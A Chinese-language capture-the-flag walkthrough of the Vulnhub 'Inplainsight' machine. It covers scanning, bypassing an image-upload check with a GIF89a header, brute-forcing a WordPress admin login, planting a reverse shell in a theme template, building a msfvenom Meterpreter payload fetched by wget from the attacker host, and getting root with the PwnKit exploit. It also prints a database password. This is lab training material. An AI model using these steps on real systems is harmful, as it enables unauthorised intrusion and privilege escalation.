Vulnhub之Inplainsight靶机详细测试过程及经验教训

Inplainsight

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:f9:29:62      1      60  PCS Systemtechnik GmbH    

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 20:38 EDT
Nmap scan report for kb.final (192.168.56.254)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 392d3630aaac5d1601082c5fc56717b4 (RSA)
|   256 b021a7430c928570ff57c6f937dfe5a2 (ECDSA)
|_  256 7399d582878c0abc3d1e8daab169aa35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:F9:29:62 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds

NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 IPS Corp
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47934|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 ..
-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
226 Directory send OK.
ftp> get todo.txt
local: todo.txt remote: todo.txt
229 Entering Extended Passive Mode (|||24332|)
150 Opening BINARY mode data connection for todo.txt (306 bytes).
100% |********************************************************************************|   306      410.47 KiB/s    00:00 ETA
226 Transfer complete.
306 bytes received in 00:00 (260.98 KiB/s)

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat todo.txt      
mike - please get ride of that worthless wordpress instance! it's a security ris
k.  if you have privilege issues, please ask joe for assitance.

joe - stop leaving backdoors on the system or your access will be removed! y
our rabiit holes aren't enough for these elite cyber hacking types.

- boss person

  1. 用户:mike, joe

  2. 可能有backdoor文件

  3. 目标站点是wordpress?

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,js,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/04/15 20:56:47 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 84027]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.254/wordpress/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1319837 / 1323366 (99.73%)===============================================================
2023/04/15 20:59:29 Finished
==========================================================

Gobuster工具识别出目录/wordpress,访问该目录,发现页面显示不完整,查看页面源代码,可知需要添加主机名到/etc/hosts文件:inplainsight

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  inplainsight

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -e u,p                                        
________________________________________________________
i] User(s) Identified:

[+] bossperson
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


wpscan工具识别出用户名bossperson,看是否可以破解出密码

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -U bossperson -P /usr/share/wordlists/rockyou.txt 

运行了15分钟,仍然没有破解出密码,暂时放弃这个方向。

接下来看能否扫描出有漏洞的插件?

(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ --plugins-detection mixed

没有识别出有漏洞的插件。

回到默认页面,注意到:



This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file (located at /var/www/html/index.htnl) before continuing to operate your HTTP server.

If you are a normal user of this web site and don't know what this page is about, this probably means that the site is currently unavailable due to maintenance. If the problem persists, please contact the site's administrator.

存在一个文件/var/www/html/index.htnl

扩展名很奇怪,访问该页面

里面有个动画图片,点击一下,就跳转到另一个页面,可以上传文件

但是当上传shell.php时,返回错误:File is not an image.

用burpsuite拦截请求,看能否通过修改application-type来绕过

在Burpsuite修改应用类型为image/jpeg,未能成功

挡在shell.php头部增加一行:GIF89a

此时返回:File is an image - image/gif.此时页面源代码有注释:


<!--c28tZGV2LXdvcmRwcmVzcw==-->
</body></html>

对其进行解码:

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ echo 'c28tZGV2LXdvcmRwcmVzcw==' | base64 -d                  
so-dev-wordpress     

这应该是另外一个目录,这也就与todo文件中的描述对应起来,因此对该so-dev-wordpress进行扫描

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -e u,p
[i] User(s) Identified:

[+] mike
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

    
(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U mike -P /usr/share/wordlists/rockyou.txt

运行了15分钟,没有破解出密码。

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress --plugins-detection mixed  

wpscan工具也没有扫描出有漏洞的插件。

那看能不能破解出另外一个用户admin的密码,在感觉没啥希望的时候,运行了5分钟以后得到了密码:

─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U admin -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
 | Username: admin, Password: admin1

用admin:admin1登录以后才发现mike是普通用户,而admin是管理员,很多情况下wpscan工具扫描出的一个用户是管理员,但是本靶机并非这种情况

将shell.php替换theme editor中的404模板,然后访问4o4.php文件得到shell

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 54968
Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 22:30:48 up  1:58,  0 users,  load average: 0.03, 1.09, 1.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@inplainsight:/$ cd /home
cd /home
www-data@inplainsight:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd joe
cd joe
www-data@inplainsight:/home/joe$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 joe  joe  4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 joe  joe   220 May  5  2019 .bash_logout
-rw-r--r-- 1 joe  joe  3.7K May  5  2019 .bashrc
drwx------ 2 joe  joe  4.0K Nov 21  2019 .cache
drwx------ 3 joe  joe  4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 joe  joe   807 May  5  2019 .profile
-rw-rw---- 1 joe  joe    76 Nov 22  2019 journal
www-data@inplainsight:/home/joe$ cd ..
cd ..
www-data@inplainsight:/home$ ls -lah
ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd mike
cd mike
www-data@inplainsight:/home/mike$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 mike mike 4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike  220 Nov 21  2019 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Nov 21  2019 .bashrc
drwx------ 2 mike mike 4.0K Nov 21  2019 .cache
drwx------ 3 mike mike 4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 mike mike  807 Nov 21  2019 .profile

提权

www-data@inplainsight:/var/www/html/so-dev-wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );

/** MySQL database username */
define( 'DB_USER', 'sodevwp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );


接下里看能不能得到Meterpreter会话

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

将escalate.elf上传到目标主机/tmp目录,修改权限,并执行(同时在kali linux启动msfconsole)

ww-data@inplainsight:/tmp$ wget http://192.168.56.206:8000/escalate.elf
wget http://192.168.56.206:8000/escalate.elf
--2023-04-15 22:40:41--  http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      

2023-04-15 22:40:41 (80.0 MB/s) - ‘escalate.elf’ saved [207/207]

www-data@inplainsight:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
www-data@inplainsight:/tmp$ ./escalate.elf
./escalate.elf

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.206:6666 
[*] Sending stage (1017704 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:50464) at 2023-04-15 22:40:54 -0400

运行Linux suggester寻找是否存在可以用于本地提权的漏洞

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.254 - Collecting local exploits for x86/linux...
[*] 192.168.56.254 - 181 exploit checks are being tried...
[+] 192.168.56.254 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.254 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.254 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.254 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 56 / 56
[*] 192.168.56.254 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/netfilter_priv_esc_ipv4                        Yes                      The target appears to be vulnerable.                                                                                                                       
 3   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.                                                                          
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.206:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.sfhgqnd
[+] The target is vulnerable.
[*] Writing '/tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.dmjtawxsqqdj
[*] Sending stage (3045348 bytes) to 192.168.56.254
[+] Deleted /tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so
[+] Deleted /tmp/.dmjtawxsqqdj/.eorecnkoiqu
[+] Deleted /tmp/.dmjtawxsqqdj
[*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:52522) at 2023-04-15 22:45:20 -0400
meterpreter > shell
Process 2293 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 48K
drwx------  5 root root 4.0K Dec  2  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx  1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Aug 27  2019 .bashrc
drwx------  2 root root 4.0K Nov 21  2019 .cache
drwx------  3 root root 4.0K Nov 21  2019 .gnupg
-rw-------  1 root root  472 Nov 21  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 27  2019 .profile
drwxr-xr-x  2 root root 4.0K Nov 22  2019 .vim
-rw-------  1 root root  11K Dec  2  2019 .viminfo
-rw-r--r--  1 root root  408 Nov 22  2019 flag.txt
cat flag.txt

                                          __          
  ____  ____   ____    ________________ _/  |_  ______
_/ ___\/  _ \ /    \  / ___\_  __ \__  \\   __\/  ___/
\  \__(  <_> )   |  \/ /_/  >  | \// __ \|  |  \___ \ 
 \___  >____/|___|  /\___  /|__|  (____  /__| /____  >
     \/           \//_____/            \/          \/ 

easy right? thanks for playing.

feel free to leave feedback with me @bzyo_


成功提权并得到root flag

经验教训

  1. 在破解so-dev-wp的wordpress站点用户密码时,按照以往的规律,被wpscan工具识别的第一个用户是管理员,因此就重点破解第一个用户名的密码mike,好在在破解第2个用户admin时,没有花费太长时间就破解出密码。

  2. 本靶机的第一个突破点是,默认页面中有个不寻常的文件名,然后访问你该文件时,需要注意点击一下图片,否则会错过整个渗透的机会

热门相关:这个人仙太过正经   薄先生,情不由己   薄先生,情不由己   仗剑高歌   寂静王冠